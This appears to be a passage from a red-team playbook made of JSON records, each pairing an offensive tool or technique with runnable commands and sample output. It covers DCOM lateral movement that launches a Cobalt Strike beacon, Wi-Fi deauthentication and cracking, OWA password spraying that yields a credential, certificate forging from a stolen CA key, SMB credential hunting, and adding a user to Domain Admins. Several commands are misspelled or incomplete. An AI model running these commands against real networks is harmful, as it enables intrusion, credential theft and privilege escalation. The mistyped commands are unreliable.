"cmd": ".\\\\ldapsearch.exe -x -h 127.0.0.1 -b dc=maxcrc,dc=com -w PW -D \"cn=admin\"",
"requirements": {
"tag": "INTEL:DOMAIN:DC"
}
},
{
"id": "e567991e-b395-4f77-ae7c-05961fbfd03d",
"name": "User enum",
"description": "",
"tag": "",
"results": [],
"cmd": "ldapsearch -x -h <ip> -s base",
"requirements": {
"tag": "INTEL:DOMAIN:DC"
}
}
]
}
New tool: Invoke-DCOM
"name": "Invoke-DCOM",
"phases": [
"01. Initial Access",
"07. Lateral Movement"
],
"category": "",
"stealthy": false,
"oss": [
"Windows"
],
"source": "https://github.com/EmpireProject/Empire/blob/master/data/module_source/lateral_movement/Invoke-DCOM.ps1",
"description": "Lateral Move via DCOM.",
"undetected": [],
"detected": [],
"content": "# Invoke-DCOM\n\n## [[DCOM]]\n'''\nImport-Module .\\Invoke-DCOM.ps1\nInvoke-DCOM -ComputerName '192.168.2.100' -Method MMC20.Application -Command \"calc.exe\"\nInvoke-DCOM -ComputerName '192.168.2.100' -Method ExcelDDE -Command \"calc.exe\"\nInvoke-DCOM -ComputerName '192.168.2.100' -Method ServiceStart \"MyService\"\n'''\n\nTo interact over Distributed Component Object Model (DCOM), we must use an external tool such as [[Invoke-DCOM]].\n''''''beacon\nbeacon> powershell-import C:\\Tools\\Invoke-DCOM.ps1\nbeacon> powershell Invoke-DCOM -ComputerName srv1 -Method MMC20.Application -Command C:\\Windows\\beacon-smb.exe\nCompleted\n\nbeacon> link srv1\n[+] established link to child beacon: 10.10.1.20\n''''''\n\nDCOM is more complicated to detect, since each \"Method\" works in a different way. In the particular case of 'MMC20.Application', the spawned process will be a child of 'mmc.exe'.\n\n''''''\nProcessId: 952\nImage: C:\\Windows\\beacon-smb.exe\nParentImage: C:\\Windows\\System32\\mmc.exe\n'''''' \nProcesses started via DCOM may also be seen where the parent is 'svchost.exe' (started with the command line '-k DcomLaunch').\n\n",
"commands": [
{
"id": "cfb6398e-d128-41e6-8e25-9f3effdcf564",
"name": "Import",
"description": "Import module",
"tag": "",
"results": [],
"cmd": "Import-Module .\\Invoke-DCOM.ps1"
},
{
"id": "ffd4d5ff-e7cf-4621-b07d-f69d9687b635",
"name": "Execute command via MMC20.Application",
"description": "Svchost spawns mmc.exe which opens a listening port via RPC binding",
"tag": "",
"results": [
"EXECUTION:REMOTE"
],
"cmd": "Invoke-DCOM -ComputerName '192.168.2.100' -Method MMC20.Application -Command \"calc.exe\"",
"requirements": {
"and": [
{
"tag": "SERVICE:DCOM"
},
{
"tag": "SERVICE:RPC"
},
{
"tag": "PRIVS:ADMIN"
}
]
}
},
{
"id": "ded4b315-b2e7-435b-bb11-d21234a1b32c",
"name": "Execute command via ExcelDDE",
"description": "",
"tag": "",
"results": [
"EXECUTION:REMOTE"
],
"cmd": "Invoke-DCOM -ComputerName '192.168.2.100' -Method ExcelDDE -Command \"calc.exe\"",
"requirements": {
"and": [
{
"tag": "SERVICE:DCOM"
},
{
"tag": "SERVICE:RPC"
},
{
"tag": "PRIVS:ADMIN"
}
]
}
},
{
"id": "16dee6f1-13c1-4e1c-a5e1-52a17830506b",
"name": "Execute command via ServiceStart ",
"description": "",
"tag": "",
"results": [
"EXECUTION:REMOTE"
],
"cmd": "Invoke-DCOM -ComputerName '192.168.2.100' -Method ServiceStart \"MyService\"",
"requirements": {
"and": [
{
"tag": "SERVICE:DCOM"
},
{
"tag": "SERVICE:RPC"
},
{
"tag": "PRIVS:ADMIN"
}
]
}
}
]
}```
New tool: FinalRecon
{
"name": "FinalRecon",
"phases": [
"02. Reconnaissance"
],
"category": "",
"stealthy": false,
"platforms": [
"Python"
],
"source": "https://github.com/thewhiteh4t/FinalRecon",
"description": "FinalRecon is an automatic web reconnaissance tool written in python. Goal of FinalRecon is to provide an overview of the target in a short amount of time while maintaining the accuracy of results. Instead of executing several tools one after another it can provide similar results keeping dependencies small and simple.",
"undetected": [],
"detected": [],
"content": "## Installation\n'''sh\ngit clone https://github.com/thewhiteh4t/FinalRecon.git\ncd FinalRecon\npip3 install -r requirements.txt\n'''\n\n## [[Passive Reconnaissance]]\n'''sh\npython3 finalrecon.py -h\nusage: finalrecon.py [-h] [--headers] [--sslinfo] [--whois] [--crawl] [--full]\n url\n\nFinalRecon - OSINT Tool for All-In-One Web Recon | v1.0.0\n\npositional arguments:\n url Target URL\n\noptional arguments:\n -h, --help show this help message and exit\n --headers Get Header Information\n --sslinfo Get SSL Certificate Information\n --whois Get Whois Lookup\n --crawl Crawl Target Website\n --full Get Full Analysis, Test All Available Options\n\n# Check headers\npython3 finalrecon.py --headers <url>\n\n# Check ssl Certificate\npython3 finalrecon.py --sslinfo <url>\n\n# Check whois Information\npython3 finalrecon.py --whois <url>\n\n# Crawl Target\npython3 finalrecon.py --crawl <url>\n\n# full scan\npython3 finalrecon.py --full <url>\n'''\n\n\n",
"commands": [
{
"id": "3f7795a8-a883-450f-900d-6b37c0dd9449",
"name": "Install",
"description": "",
"tag": "",
"results": [],
"cmd": "git clone https://github.com/thewhiteh4t/FinalRecon.git\ncd FinalRecon\npip3 install -r requirements.txt"
},
{
"id": "3ea5ed52-fa49-4ad3-a7f2-3e7e49b873ae",
"name": "Check SSL Certificate",
"description": "",
"tag": "",
"results": [],
"cmd": "python3 finalrecon.py --sslinfo <url>"
},
{
"id": "447d2228-3aac-45cf-86aa-35183a405b2c",
"name": "Check whois Information",
"description": "",
"tag": "",
"results": [],
"cmd": "python3 finalrecon.py --whois <url>"
},
{
"id": "511c55e2-eaef-4a11-9a62-54d74a89736b",
"name": "Crawl Target",
"description": "",
"tag": "",
"results": [],
"cmd": "python3 finalrecon.py --crawl <url>"
},
{
"id": "787e77cb-9e0b-4164-a58b-210b751f28f1",
"name": "Full Scan",
"description": "",
"tag": "",
"results": [],
"cmd": "python3 finalrecon.py --full <url>"
}
]
}
New technique: DCOM
"id": "16097d41-d915-4e0a-aa53-d49b24f66995",
"name": "DCOM",
"phase": "07. Lateral Movement",
"ttp": "T1021.003",
"external": false,
"description": "DCOM is an extension of COM (Component Object Model), which allows applications to instantiate and access the properties and methods of COM objects on a remote computer just like objects on the local machine using the DCERPC-based DCOM protocol. Information about the identity, the implementation and the configuration of every COM (and DCOM) object is stored in the registry, and associated with a few important identifiers:\n- CLSID - The Class Identifier is a GUID, which acts as a unique identifier for a COM class, and every class registered in Windows is associated with a CLSID (COM objects may be used without registration, but that is beyond the scope of this article). The CLSID key in the registry points to the implementation of the class, using the InProcServer32 subkey in case of a dll-based object, and the LocalServer32 key in case of an exe.\n- ProgID - The Programmatic Identifier is an optional identifier, which can be used as a more user-friendly alternative to a CLSID, as it does not have to adhere to the intimidating GUID format of CLSIDs (\"System.AppDomainManager\", for example, is much easier on the eyes than a GUID). ProgIDs are not guaranteed to be unique, and unlike CLSID, not every class is associated with a ProgID.\n- AppID - The Application Identifier is used to specify the configuration of one or more COM objects associated with the same executable. This includes the permissions given to various groups to instantiate and access the associated classes, both locally and remotely.\n\nThe instantiation of a remote DCOM object behaves as follows:\n1. The client machine requests an instantiation of an object denoted by a CLSID from a remote machine. If the client uses a ProgID, it is first resolved locally to a CLSID.\n2. The remote machine checks if there is an AppID associated with the CLSID in question, and verifies the permissions of the client.\n3. If all goes well, the DCOMLaunch service creates an instance of the requested class, most commonly by running the executable of the LocalServer32 subkey, or by creating a DllHost process to host a dll referenced by the InProcServer32 subkey.\n4. Communication is established between the client application and the server process. In most cases, the new process is created in the session associated with the DCOM communication.\n5. The client can then access the members and methods of the newly created object.",
"content": "# DCOM\n\n## Cobalt Strike\n-\n\n# Tools\n########\n########",
"category": "",
"stealthy": false,
"changes": [
"\n## [[Invoke-DCOM]]\n'''\nImport-Module .\\Invoke-DCOM.ps1\nInvoke-DCOM -ComputerName '192.168.2.100' -Method MMC20.Application -Command \"calc.exe\"\nInvoke-DCOM -ComputerName '192.168.2.100' -Method ExcelDDE -Command \"calc.exe\"\nInvoke-DCOM -ComputerName '192.168.2.100' -Method ServiceStart \"MyService\"\n'''\n\nTo interact over Distributed Component Object Model (DCOM), we must use an external tool such as [[Invoke-DCOM]].\n''''''beacon\nbeacon> powershell-import C:\\Tools\\Invoke-DCOM.ps1\nbeacon> powershell Invoke-DCOM -ComputerName srv1 -Method MMC20.Application -Command C:\\Windows\\beacon-smb.exe\nCompleted\n\nbeacon> link srv1\n[+] established link to child beacon: 10.10.1.20\n''''''\n\nDCOM is more complicated to detect, since each \"Method\" works in a different way. In the particular case of 'MMC20.Application', the spawned process will be a child of 'mmc.exe'.\n\n''''''\nProcessId: 952\nImage: C:\\Windows\\beacon-smb.exe\nParentImage: C:\\Windows\\System32\\mmc.exe\n'''''' \nProcesses started via DCOM may also be seen where the parent is 'svchost.exe' (started with the command line '-k DcomLaunch')."
],
"tools": [
"Invoke-DCOM"
],
"references": [
"https://www.cybereason.com/blog/dcom-lateral-movement-techniques",
"https://www.winccoa.com/documentation/WinCCOA/3.18/en_US/Treiber_OPC/opc_c_dcom.html"
],
"steps": [
{
"id": "5a71f508-42a9-403a-9dbc-250a1a866b00",
"name": "Get RCE via DCOM",
"description": "",
"requirements": {
"and": [
{
"tag": "SERVICE:DCOM"
},
{
"tag": "SERVICE:RPC"
},
{
"tag": "PRIVS:ADMIN"
}
]
},
"results": [
"EXECUTION:REMOTE"
]
}
]
}```
New tool: aircrack-ng
"name": "aircrack-ng",
"phases": [
"01. Initial Access"
],
"category": "",
"stealthy": false,
"oss": [
"Linux"
],
"source": "https://www.aircrack-ng.org/",
"description": "Aircrack-ng is a complete suite of tools to assess Wi-Fi network security.",
"undetected": [],
"detected": [],
"content": "# aircrack-ng\n\n'''java\napt-get install aircrack-ng -y\n'''\n\n## [[WiFi crack]]\n'''java\n//Set wificard in monitor mode (monitor.sh)\nIfconfig --> take wlan card name\nIfconfig name down //runterfahren\nIfconfig name mode monitor\nIfconfig name up\nIwconfig name | grep Mode\n\n//Change MAC\n\n\n//Check if prozess interfering! IF KILL\nAirmon-ng check name\nKill 1312 (Networkmanager)\nKill 17917 (dhclient)\nKill 1556, 1215, 1216\n\n//Netzwerk sniffen\nAirodump-ng name\nAirodumo -c [channel] -w [FILE] --bsssid [MAC]\nAirplay-ng -0 0 -a [MAC] //deauthenticate dauerhaft\nAircrack-ng -w [word list] capture.cap\n\n//Change networkcard channel to Router channel\nAireplay-ng -0 0 -a [MAC] name --> get channel + MAC(bssid)\nIwconfig name channel 6\n'''\n\n\n",
"commands": [
{
"id": "0a82bdb0-4e8d-4dfa-b855-0194965b85a9",
"name": "Activate monitor mode",
"description": "Get the interface and put it into monitoring mode",
"tag": "",
"results": [],
"cmd": "Ifconfig\nIfconfig <if> down\nIfconfig <if> mode monitor\nIfconfig <if> up\nIwconfig <if> | grep Mode"
},
{
"id": "609c27b6-c698-4641-b262-5afbf527920f",
"name": "Check for interfering processes",
"description": "",
"tag": "",
"results": [],
"cmd": "airmon-ng check <if>"
},
{
"id": "8fac72ec-9855-4a68-a334-024d5303eb07",
"name": "Sniff network",
"description": "",
"tag": "",
"results": [],
"cmd": "Airodump-ng name\nAirodump -c [channel] -w [FILE] --bsssid [MAC]"
},
{
"id": "9969180d-e48a-4a57-8b78-d249bdfee6fd",
"name": "Deauth device",
"description": "Deauthenticate a device permanently",
"tag": "",
"results": [],
"cmd": "Airplay-ng -0 0 -a [MAC]"
},
{
"id": "47ad1864-2180-4d2b-9e28-a23c55d1d5dc",
"name": "Aircrack with wordlist",
"description": "",
"tag": "",
"results": [],
"cmd": "Aircrack-ng -w [word list] capture.cap"
},
{
"id": "047b2311-6a3d-4e2d-8e89-fcde97fa3575",
"name": "Change interface channel",
"description": "Change network card channel to router channel",
"tag": "",
"results": [],
"cmd": "Aireplay-ng -0 0 -a [MAC] <if>\nIwconfig <if> channel <6>"
}
]
}```
New tool: MDI Check Instance
{
"name": "MDI Check Instance",
"phases": [
"02. Reconnaissance"
],
"category": "",
"stealthy": true,
"platforms": [
"Windows"
],
"source": "https://github.com/thalpius/Microsoft-Defender-for-Identity-Check-Instance",
"description": "This script gets all accepted domains in Microsoft 365 using autodiscover, gets the tenant name and checks if there is a Microsoft Defender for Identity instance. This way you can figure out if a company runs Microsoft Defender for Identity.",
"undetected": [],
"detected": [],
"commands": [],
"content": "",
"references": []
}
New tool: Metasploit
{
"name": "Metasploit",
"phases": [
"02. Reconnaissance"
],
"category": "",
"stealthy": false,
"platforms": [
"Python"
],
"source": "https://www.metasploit.com/",
"description": "The world’s most used penetration testing framework",
"undetected": [],
"detected": [],
"commands": [
{
"id": "4994f588-77be-4a93-aab2-a2e082cd40e4",
"name": "Get SMB Version",
"description": "",
"tag": "",
"results": [],
"cmd": "use auxiliary/scanner/smb/smb_version"
},
{
"id": "426ada86-74c3-4eca-99ab-b5d561ecd96e",
"name": "Get SMTP",
"description": "",
"tag": "",
"results": [],
"cmd": "use auxiliary/scanner/snmp/snmp_login"
}
],
"content": "",
"references": []
}
New tool: MailSniper
{
"name": "MailSniper",
"phases": [
"01. Initial Access",
"08. Credentials & User Impersonation"
],
"category": "",
"stealthy": false,
"platforms": [
"Windows"
],
"source": "https://github.com/dafthack/MailSniper",
"description": "MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords, insider intel, network architecture information, etc.). It can be used as a non-administrative user to search their own email or by an Exchange administrator to search the mailboxes of every user in a domain.",
"undetected": [],
"detected": [],
"content": "\n## [[Internal Phishing]] [[Phishing]]\nGet internal domain names\n''''''\nipmo C:\\Tools\\MailSniper\\MailSniper.ps1\nInvoke-DomainHarvestOWA -ExchHostname 10.10.15.100\n\n[*] Harvesting domain name from the server at 10.10.15.100\nThe domain appears to be: EDU or evil.corp\n''''''\n\n Password spray\n''''''\nInvoke-PasswordSprayOWA -ExchHostname 10.10.15.100 -UserList .\\valid.txt -Password Summer2022\n\n[*] Now spraying the OWA portal at https://10.10.15.100/owa/\n[*] SUCCESS! User:EDU\\patrick Password:Summer2022\n[*] A total of 1 credentials were obtained.\n''''''\n\n\n",
"commands": [
{
"id": "77b80a4a-d8e9-48aa-b9d1-f201bd7c68ae",
"name": "Get internal domain names",
"description": "",
"tag": "",
"results": [],
"cmd": "ipmo C:\\Tools\\MailSniper\\MailSniper.ps1\nInvoke-DomainHarvestOWA -ExchHostname 10.10.15.100"
},
{
"id": "90f47a63-a165-4864-a3b1-5ef66ff184ef",
"name": "Password Spray",
"description": "",
"tag": "",
"results": [
"CRED:PASS:PLAIN"
],
"cmd": "Invoke-PasswordSprayOWA -ExchHostname 10.10.15.100 -UserList .\\valid.txt -Password Summer2022",
"requirements": {
"tag": "SERVICE:OWA"
}
}
]
}
New tool: AzureC2Relay
"name": "AzureC2Relay",
"phases": [
"00. Infrastructure"
],
"category": "",
"stealthy": false,
"oss": [
"Linux"
],
"source": "https://github.com/Flangvik/AzureC2Relay",
"description": "AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.",
"undetected": [],
"detected": [],
"content": "\n## [[00.Infrastructure/Redirector]]\n\n",
"commands": [
{
"id": "7ea9d673-38f7-4dcf-9edb-ce11f6ec69b2",
"name": "Deploy Azure function",
"description": "Spawn an redirector via Azure functions",
"tag": "",
"results": [],
"cmd": "&([scriptblock]::Create((Invoke-WebRequest -UseBasicParsing 'https://dot.net/v1/dotnet-install.ps1'))) -runtime dotnet -version 3.1.0\nInvoke-WebRequest 'https://releases.hashicorp.com/terraform/0.14.6/terraform_0.14.6_windows_amd64.zip' -OutFile 'terraform.zip'\nExpand-Archive -Path terraform.zip -DestinationPath \"$([Environment]::GetFolderPath('ApplicationData'))\\TerraForm\\\"\nsetx PATH \"%PATH%;$([Environment]::GetFolderPath('ApplicationData'))\\TerraForm\\\"\nInvoke-WebRequest -Uri https://aka.ms/installazurecliwindows -OutFile .\\AzureCLI.msi; Start-Process msiexec.exe -Wait -ArgumentList '/I AzureCLI.msi /quiet'; rm .\\AzureCLI.msi"
}
]
}```
New tool: John the Ripper
{
"name": "John the Ripper",
"phases": [
"02. Reconnaissance",
"08. Credentials & User Impersonation"
],
"category": "",
"stealthy": false,
"platforms": [
"Linux"
],
"source": "https://www.openwall.com/john/",
"description": "John the Ripper is an Open Source password security auditing and password recovery tool available for many operating systems.",
"undetected": [],
"detected": [],
"content": "# John the Ripper\n\n\n## [[Crack Credentials]]\nCracking netntlmv2\n'''sh\n--format=netntlmv2 --wordlist=wordlist svc_mssql-netntlmv2\n'''\n\n\n",
"commands": [
{
"id": "ff58951f-1f3f-4ba1-b0de-a11fe3a78740",
"name": "Cracking netntlmv2",
"description": "",
"tag": "",
"results": [],
"cmd": "john --format=netntlmv2 --wordlist=wordlist svc_mssql-netntlmv2"
},
{
"id": "2d47de76-3f5c-4fc6-8aae-e2df72708d60",
"name": "Cracking Secretsdump",
"description": "",
"tag": "",
"results": [
"CRED:PASS:PLAIN"
],
"cmd": "john --format=mscash2 --wordlist=/root/mydict.txt /root/2crack.txt"
}
]
}
New tool: Espoofer
{
"name": "Espoofer",
"phases": [
"01. Initial Access",
"08. Credentials & User Impersonation"
],
"category": "",
"stealthy": false,
"platforms": [
"Python"
],
"source": "https://github.com/chenjj/espoofer",
"description": "An email spoofing testing tool that aims to bypass SPF/DKIM/DMARC and forge DKIM signatures.🍻",
"undetected": [],
"detected": [],
"content": "\n## [[Internal Phishing]][[Phishing]]\nChecking for spoofable header\n\n",
"commands": [
{
"id": "2e5b14fc-a885-49d1-9c5f-2f8f04290901",
"name": "Install",
"description": "",
"tag": "",
"results": [],
"cmd": "git clone https://github.com/chenjj/espoofer\nsudo pip3 install -r requirements.txt"
}
]
}
New tool: reg
{
"name": "reg",
"phases": [
"03. Host Enumeration"
],
"category": "",
"stealthy": false,
"platforms": [
"Windows"
],
"source": "Windows",
"description": "Registry query stuff",
"undetected": [],
"detected": [],
"content": "\n## [[PowerShell Logging]]\n#get_powershell_logging\n'''ps\nreg query HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Policies\\Microsoft\\Windows\\PowerShell\\Transcription\n \nreg query HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Policies\\Microsoft\\Windows\\PowerShell\\ModuleLogging\n\nreg query HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\n'''\n\n## [[PowerShell-Version]]\n'''ps\nreg query HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\PowerShell\\1\\PowershellEngine /v PowershellVersion\n\nreg query HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\PowerShell\\3\\PowershellEngine /v PowershellVersion\n\nGet-ItemPropertyValue HKLM:\\SOFTWARE\\Microsoft\\PowerShell\\*\\PowerShellEngine\n-Name PowerShellVersion\n'''\n\nreg query HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShellCore\\Transcription\n\"EnableTranscripting\"=dword:00000001\n\"OutputDirectory\"=\"c:\\windows\\temp\\pstranscripts\"\nreg query HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\Transcription\n\"EnableTranscripting\"=dword:00000001\n\"OutputDirectory\"=\"c:\\windows\\temp\\pstranscripts\"",
"commands": [
{
"id": "f74abf51-9446-4701-a3ab-7077a6602a88",
"name": "PowerShell Logging",
"description": "",
"tag": "",
"results": [],
"cmd": "reg query HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Policies\\Microsoft\\Windows\\PowerShell\\Transcription\nreg query HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Policies\\Microsoft\\Windows\\PowerShell\\ModuleLogging\nreg query HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging"
},
{
"id": "a59f2da6-d883-4cb3-ad3e-65085418256e",
"name": "PowerShell Versions",
"description": "",
"tag": "",
"results": [],
"cmd": "reg query HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\PowerShell\\1\\PowershellEngine /v PowershellVersion\n\nreg query HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\PowerShell\\3\\PowershellEngine /v PowershellVersion\n\nGet-ItemPropertyValue HKLM:\\SOFTWARE\\Microsoft\\PowerShell\\*\\PowerShellEngine\n-Name PowerShellVersion"
},
{
"id": "28ffd6e0-476f-450c-a4cb-196f247d22d7",
"name": "SafeDllSearchMode",
"description": "If enabled, DLLs found in SYSTEM32 will be loaded instead of the local directory",
"tag": "",
"results": [],
"cmd": "reg query HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Session Manager\\SafeDllSearchMode"
}
]
}
New tool: MANSPIDER
"name": "MANSPIDER",
"phases": [
"02. Reconnaissance"
],
"category": "",
"stealthy": false,
"platforms": [
"Python"
],
"source": "https://github.com/blacklanternsecurity/MANSPIDER",
"description": "Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!",
"undetected": [],
"detected": [],
"content": "## Installation\n'''sh\n(Optional) Install these dependencies to add additional file parsing capability:\n# for images (png, jpeg)\n$ sudo apt install tesseract-ocr\n\n# for legacy document support (.doc)\n$ sudo apt install antiword\nInstall manspider (please be patient, this can take a while):\n\n$ pip install pipx\n$ pipx install git+https://github.com/blacklanternsecurity/MANSPIDER\n'''\n\n## [[Credentials]]\nSearch the network for filenames that may contain creds\n>manspider 192.168.0.0/24 -f passw user admin account network login logon cred -d evilcorp -u admin -p password\n\nSearch for XLSX files containing \"password\"\n>manspider share.evil.corp -c password -e xlsx -d evilcorp -u admin -p password\n\nSearch for interesting file extensions\n> manspider share.evil.corp -e bat com vbs ps1 psd1 psm1 pem key rsa pub reg txt cfg conf config -d evilcorp -u admin -p password\n\n",
"commands": [
{
"id": "e15907bc-e26c-4462-b8c5-ed5a740917eb",
"name": "Install",
"description": "",
"tag": "",
"results": [],
"cmd": "sudo apt install tesseract-ocr\nsudo apt install antiword\npip install pipx\npipx install git+https://github.com/blacklanternsecurity/MANSPIDER"
},
{
"id": "a562be37-6d72-4372-adbc-b78eee0a91a4",
"name": "Search the network for filenames that may contain creds",
"description": "",
"tag": "",
"results": [
"CRED:PASS:PLAIN"
],
"cmd": "manspider 192.168.0.0/24 -f passw user admin account network login logon cred -d evilcorp -u admin -p password"
},
{
"id": "6027516d-5e31-4074-9042-a44723327416",
"name": "Search for XLSX files containing \"password\"",
"description": "",
"tag": "",
"results": [
"CRED:PASS:PLAIN"
],
"cmd": "manspider share.evil.corp -c password -e xlsx -d evilcorp -u admin -p password"
},
{
"id": "6b5dc298-ee54-4b8f-be54-7843b7ff873c",
"name": "Search for interesting file extensions",
"description": "",
"tag": "",
"results": [
"CRED:PASS:PLAIN"
],
"cmd": "manspider share.evil.corp -e bat com vbs ps1 psd1 psm1 pem key rsa pub reg txt cfg conf config -d evilcorp -u admin -p password"
}
]
}```
New tool: dnsrecon
{
"name": "dnsrecon",
"phases": [
"02. Reconnaissance"
],
"category": "OSINT",
"stealthy": false,
"platforms": [
"Python"
],
"source": "https://github.com/darkoperator/dnsrecon",
"description": "DNSRecon is a Python port of a Ruby script that I wrote to learn the language and about DNS in early 2007. This time I wanted to learn about Python and extend the functionality of the original tool and in the process re-learn how DNS works and how could it be used in the process of a security assessment and network troubleshooting.",
"undetected": [],
"detected": [],
"content": "\n## [[DNS]]\nEnumerate DNS\n\n",
"commands": [
{
"id": "56135c43-1def-4d31-80ba-2f00042555b8",
"name": "Base domain enumeration",
"description": "",
"tag": "",
"results": [],
"cmd": "dnsrecon -d www.acme.com"
},
{
"id": "59b387be-ae9c-4bda-8c05-e8c9a92faa45",
"name": "Base domain enum to SQL",
"description": "",
"tag": "",
"results": [],
"cmd": "dnsrecon -d www.acme.com --db /path/to/sqllite.file"
},
{
"id": "ddc7f920-b894-4b73-abc1-aa473288b980",
"name": "Zone walking",
"description": "",
"tag": "",
"results": [],
"cmd": "dnsrecon -d www.acme.com -t zonewalk"
},
{
"id": "19b43fa4-ebd8-4856-9aec-640afe215bba",
"name": "Brute-forcing of domains",
"description": "",
"tag": "",
"results": [],
"cmd": "dnsrecon -d www.acme.com -D /path/to/dict.txt -t brt"
},
{
"id": "88e7859d-2e6c-483a-ad2d-7c9d9376f74b",
"name": "Reverse lookup",
"description": "",
"tag": "",
"results": [],
"cmd": "dnsrecon -r 208.67.222.200-208.67.222.255 -d microsoft.com\n"
}
],
"references": [
"https://www.kali.org/tools/dnsrecon/#:~:text=DNSRecon%20is%20a%20Python%20script,Perform%20common%20SRV%20Record%20Enumeration"
]
}
New technique: Local User+Groups
{ "id": "c7bf893c-5d7c-4177-9a5a-5a8828672770", "name": "Local User+Groups", "phase": "03.Host Enumeration", "ttp": "T1069.001", "external": false, "description": "Identify local groups", "content": "## Tools\n########\n########", "category": "", "stealthy": false, "changes": [ "\n## [[mmc]]\nLaunch mmc.exe, click File > Add\\remove snap-in > Local users and Groups", "\n## [[Net]]\n1. Create User:\n '''bash\n net user Patrick patrick12345! /ADD /DOMAIN\n '''\n2. List local / domain groups\n '''bash\n net group /domain\n\n Gruppenkonten für \\\\dc1.testdomain.local\n -------------------------------------------------------------------------------\n *$7O...\n *Abteilung_....\n *Domänen-Admins\n \n net localgroup [group (Remote Dektop Users)]\n '''\n1. Add User to domain /local group\n '''sh\n net group \"Domänen-Admins\" Patrick /add /domain\n\n net localgroup \"Remote Desktop Users\" Patrick /add\n net localgroup \"Administrators\" Patrick /add\n '''", "\n## [[wmic]]\nGet local user accounts\n'''cmd\nwmic useraccount list\n'''" ], "tools": [ "mmc", "Net", "wmic" ], "steps": [ { "id": "022f5b3b-423a-4419-872d-75d644b18c4c", "name": "Identify local user", "description": "", "requirements": "", "results": "localuser" }, { "id": "f552eb3c-c133-4bd3-ab11-f526e490bf11", "name": "Identify local group", "description": "", "requirements": "", "results": "localgroup" } ] }
New tool: ForgeCert
{
"name": "ForgeCert",
"phases": [
"02. Reconnaissance",
"08. Credentials & User Impersonation"
],
"category": "",
"stealthy": false,
"platforms": [
"Windows"
],
"source": "https://github.com/GhostPack/ForgeCert",
"description": "Generate certs",
"undetected": [],
"detected": [],
"content": "# ForgeCert\n\n## [[Forged Certificates]]\nGenerate certificate with stolen pk\n'''beacon\nC:\\Users\\Administrator\\Desktop>C:\\Tools\\ForgeCert\\ForgeCert\\bin\\Debug\\ForgeCert.exe --CaCertPath ca.pfx --CaCertPassword \"password\" --Subject \"CN=User\" --SubjectAltName \"[email protected]\" --NewCertPath fake.pfx --NewCertPassword \"password\"\nCA Certificate Information:\n Subject: CN=ca-1, DC=evil, DC=corp\n Issuer: CN=ca-1, DC=evil, DC=corp\n Start Date: 2/25/2022 11:29:14 AM\n End Date: 2/25/2047 11:39:08 AM\n Thumbprint: 7F8A1EFB7A50E2D1DE098085301926AA13AE0A71\n Serial: 31AC83C6678F28994CFB58207C9FB668\n\nForged Certificate Information:\n Subject: CN=User\n SubjectAltName: [email protected]\n Issuer: CN=ca-1, DC=evil, DC=corp\n Start Date: 3/1/2022 2:19:20 PM\n End Date: 3/1/2023 2:19:20 PM\n Thumbprint: 73C45EC22357C0451E0F374AC30B5C6F6034B132\n Serial: 009E1C0AE8A247695199F8157DB37E38AD\n\nDone. Saved forged certificate to fake.pfx with the password 'password'\n'''\n\n",
"commands": [
{
"id": "769c8351-fac6-43a1-abf8-e5ddcf6630d7",
"name": "Forge Cert with PK",
"description": "",
"tag": "",
"results": [],
"cmd": "ForgeCert.exe --CaCertPath ca.pfx --CaCertPassword \"password\" --Subject \"CN=User\" --SubjectAltName \"[email protected]\" --NewCertPath fake.pfx --NewCertPassword \"password\""
}
]
}
New tool: GoWitness
{
"name": "GoWitness",
"phases": [
"02. Reconnaissance",
"06. Domain Enumeration"
],
"category": "",
"stealthy": true,
"platforms": [
"Linux"
],
"source": "https://github.com/sensepost/gowitness",
"description": "Pictures of webservers",
"undetected": [],
"detected": [],
"content": "\n## [[Find Web Server]]\nScan internal network\n* Screenshot a single website \n> gowitness single https://www.google.com/\n* Screenshot a cidr using 20 threads \n> gowitness scan --cidr 192.168.0.0/24 --threads 20\n* Scan based on Nessus scan\n> .\\gowitness-2.4.0-windows-amd64.exe nessus -f .\\ScanniSceneroni_xm6g2a.nessus\n* Scan based on URL/IP file\n> .\\gowitness-2.4.0-windows-amd64.exe file -f '.\\External Pentesting\\urls.txt'\n* Screenshot open http services from an namp file \n> gowitness nmap -f nmap.xml --open --service-contains http\n* Run the report server \n> gowitness report serve\n\n",
"commands": [
{
"id": "78c1f2ef-d03b-4d0e-af0c-63566fe1733b",
"name": "Screenshot a single website",
"description": "",
"tag": "",
"results": [],
"cmd": "gowitness single https://www.google.com/"
},
{
"id": "2683dac7-4a17-4e8b-b069-8332b5df95d9",
"name": "Screenshot a cidr using 20 threads",
"description": "",
"tag": "",
"results": [],
"cmd": "gowitness scan --cidr 192.168.0.0/24 --threads 20"
},
{
"id": "0564da3e-27bf-4b2a-8fa0-48aeed967903",
"name": "Scan based on Nessus scan",
"description": "",
"tag": "",
"results": [],
"cmd": ".\\gowitness-2.4.0-windows-amd64.exe nessus -f .\\ScanniSceneroni_xm6g2a.nessus"
},
{
"id": "966b5f10-0d75-4aeb-aae8-442a9d97e8fe",
"name": "Scan based on URL/IP file",
"description": "",
"tag": "",
"results": [],
"cmd": ".\\gowitness-2.4.0-windows-amd64.exe file -f 'urls.txt"
},
{
"id": "635a546b-c13d-459b-a173-7230bcb506bb",
"name": "Screenshot open http services from an nmap file",
"description": "",
"tag": "",
"results": [],
"cmd": "gowitness nmap -f nmap.xml --open --service-contains http"
},
{
